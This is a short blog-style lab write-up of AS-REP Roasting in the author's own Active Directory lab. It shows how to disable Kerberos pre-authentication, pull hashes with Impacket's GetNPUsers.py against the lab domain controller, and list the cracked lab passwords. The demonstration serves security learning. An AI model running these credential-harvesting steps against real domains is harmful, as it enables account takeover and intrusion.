AS-REP Roasting
This attack is caused by a domain user not having Kerberos pre-authentication enabled.
For this Demo i'll be using my Active Directory lab project (DOA lab) check it out my GitHub.
LAB DIAGRAM AND SPECS
Specifications
| VM Name | OS | IP Address | Role | Specs |
|---|---|---|---|---|
| DOA-DC | Windows Server 2019 | 10.0.2.7 (static) | Domain Controller | 4GB RAM, 50GB HDD |
| DOA-PC01 | Windows 10 Pro | 10.0.2.101 (DHCP) | Domain-joined client | 2GB RAM, 40GB HDD |
| DOA-PC02 | Windows 10 Pro | 10.0.2.100 (DHCP) | Domain-joined client | 2GB RAM, 40GB HDD |
| KALI | Kali Linux 6.18 | 10.0.2.250 (static) | Attack Machine | 4GB RAM, 80GB HDD |
domain name: doa.local
Attack Demo
Step 1 — Disable Pre-Authentication
On the domain controller, disable pre-authentication using the Disable-KerbPreAuth.ps1 script, which randomly selects 2 users under the "LabUsers" OU and disables their pre-authentication.
Looks like ujack and kchimaev were randomly selected (natural selection, I guess). To verify, checking the user properties confirms the "Do Not Require Kerberos Pre-Authentication" flag is checked.
Step 2 — Install Impacket on Attack Machine
On the dedicated attack machine, install Impacket via:
python3 -m pipx install impacket
Step 3 — Retrieve Hashes with GetNPUsers.py
GetNPUsers.py retrieves hashes for users who have "Do Not Require Kerberos Pre-Authentication" set, without needing their passwords.
Syntax:
GetNPUsers.py <domain>/<user> -dc-ip <x.x.x.x>
Since both ujack and kchimaev had pre-authentication disabled, run:
GetNPUsers.py doa.local/ujack -dc-ip=10.0.2.7
GetNPUsers.py doa.local/kchimaev -dc-ip=10.0.2.7
Step 4 — Crack the Hashes
With the AS-REP hashes retrieved, crack them offline to recover the plaintext passwords:
| User | Password |
|---|---|
| ujack | Changme123! |
| kchimaev | BorzBorz7 |
Top comments (0)